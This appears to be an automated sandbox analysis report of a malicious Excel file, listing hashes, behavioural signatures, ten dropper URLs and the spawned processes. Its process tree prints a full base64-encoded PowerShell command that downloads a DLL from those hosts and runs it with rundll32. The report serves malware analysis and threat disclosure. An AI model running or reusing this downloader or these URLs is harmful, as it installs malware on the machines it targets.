Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 22:37

General

  • Target

    73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls

  • Size

    141KB

  • MD5

    a16fbff1f5cb9686bb89b10e438fa353

  • SHA1

    ed66c497457afb8309866e2cacf62857d9e844c9

  • SHA256

    73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd

  • SHA512

    35fce4faf788b1b5e074ee55a4ef2b2956d6a5b22f5fc5d1daa34bfdd5c36ccd85ac5808088d0e8a1cac147f6a4033ed8fd5e55e0930c76cbb2bdc6d74c32642

  • SSDEEP

    3072:P7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TI0Gxc:zcKoSsxzNDZLDZjlbR868O8K0c03D38X

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://chupahfashion.com/eh6bwxk/bowptl/cLo9eq8v8Vht/

exe.dropper

http://ancyh.xyz/Fox-C/LxAhgyO3fMg/

exe.dropper

http://gravton-dev-cms.policyfest.com/Fox-C/BMOkGelwu/

exe.dropper

https://capitalui.futuristic.agency/wp-admin/hwi9bnmXFFm3doo/

exe.dropper

http://cptdmy.com/zqtr/zdJE0jEOxL/

exe.dropper

https://weviralyou.com/wp-content/yl5qV15jWWfaGdSZLR/

exe.dropper

https://megabyte-xtnegocios.com/ys3v1clw/AKm6Q9/

exe.dropper

https://vmsparamedical.com/urjk0xr/PhfwL/

exe.dropper

https://viprait.com/lag5gn/cdy6k/

exe.dropper

https://comingsoon.futuristic.agency/svg/p4xODmupFbHPnr/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\programdata\ihofbnm.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1304
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AYwBoAHUAcABhAGgAZgBhAHMAaABpAG8AbgAuAGMAbwBtAC8AZQBoADYAYgB3AHgAawAvAGIAbwB3AHAAdABsAC8AYwBMAG8AOQBlAHEAOAB2ADgAVgBoAHQALwAsAGgAdAB0AHAAOgAvAC8AYQBuAGMAeQBoAC4AeAB5AHoALwBGAG8AeAAtAEMALwBMAHgAQQBoAGcAeQBPADMAZgBNAGcALwAsAGgAdAB0AHAAOgAvAC8AZwByAGEAdgB0AG8AbgAtAGQAZQB2AC0AYwBtAHMALgBwAG8AbABpAGMAeQBmAGUAcwB0AC4AYwBvAG0ALwBGAG8AeAAtAEMALwBCAE0ATwBrAEcAZQBsAHcAdQAvACwAaAB0AHQAcABzADoALwAvAGMAYQBwAGkAdABhAGwAdQBpAC4AZgB1AHQAdQByAGkAcwB0AGkAYwAuAGEAZwBlAG4AYwB5AC8AdwBwAC0AYQBkAG0AaQBuAC8AaAB3AGkAOQBiAG4AbQBYAEYARgBtADMAZABvAG8ALwAsAGgAdAB0AHAAOgAvAC8AYwBwAHQAZABtAHkALgBjAG8AbQAvAHoAcQB0AHIALwB6AGQASgBFADAAagBFAE8AeABMAC8ALABoAHQAdABwAHMAOgAvAC8AdwBlAHYAaQByAGEAbAB5AG8AdQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHkAbAA1AHEAVgAxADUAagBXAFcAZgBhAEcAZABTAFoATABSAC8ALABoAHQAdABwAHMAOgAvAC8AbQBlAGcAYQBiAHkAdABlAC0AeAB0AG4AZQBnAG8AYwBpAG8AcwAuAGMAbwBtAC8AeQBzADMAdgAxAGMAbAB3AC8AQQBLAG0ANgBRADkALwAsAGgAdAB0AHAAcwA6AC8ALwB2AG0AcwBwAGEAcgBhAG0AZQBkAGkAYwBhAGwALgBjAG8AbQAvAHUAcgBqAGsAMAB4AHIALwBQAGgAZgB3AEwALwAsAGgAdAB0AHAAcwA6AC8ALwB2AGkAcAByAGEAaQB0AC4AYwBvAG0ALwBsAGEAZwA1AGcAbgAvAGMAZAB5ADYAawAvACwAaAB0AHQAcABzADoALwAvAGMAbwBtAGkAbgBnAHMAbwBvAG4ALgBmAHUAdAB1AHIAaQBzAHQAaQBjAC4AYQBnAGUAbgBjAHkALwBzAHYAZwAvAHAANAB4AE8ARABtAHUAcABGAGIASABQAG4AcgAvACIALgBTAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJAByAG8AdwBpAGYAaQB1AGQAKQB7ACQAcgByAHkAaQB1AGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABmAGcAaABpAHUAcwA9AEcAZQB0AC0AUgBhAG4AZABvAG0AOwAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAIgArACQAcgByAHkAaQB1AGQAKwAiAC4AZABsAGwAIgA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA7AGkAZgAoAFQAZQBzAHQALQBQAGEAdABoACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzACkAewBpAGYAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdwBvAHcANgA0AFwAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgA7ACQAdAB5AGkAZAB1AGkAcwBkAGYAZgA9ACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwArACIALABmACIAKwAkAGYAZwBoAGkAdQBzADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZwBoAEQARABGAEoASABrADUAZgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHQAeQBpAGQAdQBpAHMAZABmAGYAOwBiAHIAZQBhAGsAOwB9AH0AfQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4896

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kukvfukm.j51.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    72264969baed597c6568e62a8815956e

    SHA1

    40ff9b6a8e6fb18ad1593aa8efd2ef8880047b14

    SHA256

    3f16d8092e1dab799ef6afd487211439247bf5af14f7efeb00060bf84e6579c0

    SHA512

    cbac30980e09ffb44077eb06cca082e3a731288508e344e09f807e85f7dc10a2d3f4f66131c42f6e102fb4ee60fdd4af579df823f2dbc902a4111782ce563c33

  • C:\programdata\ihofbnm.bat

    Filesize

    3KB

    MD5

    d7f8d77efca69f7600e190537d147b6c

    SHA1

    9709843ea19f342b3a95075588c4b6fdb688623d

    SHA256

    8fe05c046c282ee13765fb78ba5b27201571a74a46dbc901898255c111727caf

    SHA512

    dd975f74367e9ddaed18e0630556f14f8bd32f5e89ec13b92f933cbdfc32951e61b4da406407cb7e7cd37a2fe41726c200a0c1377ac8686f835eccfec599b5e2

  • memory/688-20-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-4-0x00007FF8AC350000-0x00007FF8AC360000-memory.dmp

    Filesize

    64KB

  • memory/688-19-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-8-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-13-0x00007FF8AA2F0000-0x00007FF8AA300000-memory.dmp

    Filesize

    64KB

  • memory/688-7-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-15-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-14-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-6-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-18-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-23-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-22-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-21-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-3-0x00007FF8EC36D000-0x00007FF8EC36E000-memory.dmp

    Filesize

    4KB

  • memory/688-12-0x00007FF8AA2F0000-0x00007FF8AA300000-memory.dmp

    Filesize

    64KB

  • memory/688-16-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-10-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-5-0x00007FF8AC350000-0x00007FF8AC360000-memory.dmp

    Filesize

    64KB

  • memory/688-2-0x00007FF8AC350000-0x00007FF8AC360000-memory.dmp

    Filesize

    64KB

  • memory/688-1-0x00007FF8AC350000-0x00007FF8AC360000-memory.dmp

    Filesize

    64KB

  • memory/688-0-0x00007FF8AC350000-0x00007FF8AC360000-memory.dmp

    Filesize

    64KB

  • memory/688-37-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-40-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-11-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-17-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-9-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-114-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-107-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/688-113-0x00007FF8EC2D0000-0x00007FF8EC4C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4896-104-0x00000206C6800000-0x00000206C6FA6000-memory.dmp

    Filesize

    7.6MB

  • memory/4896-94-0x00000206C5B50000-0x00000206C5B72000-memory.dmp

    Filesize

    136KB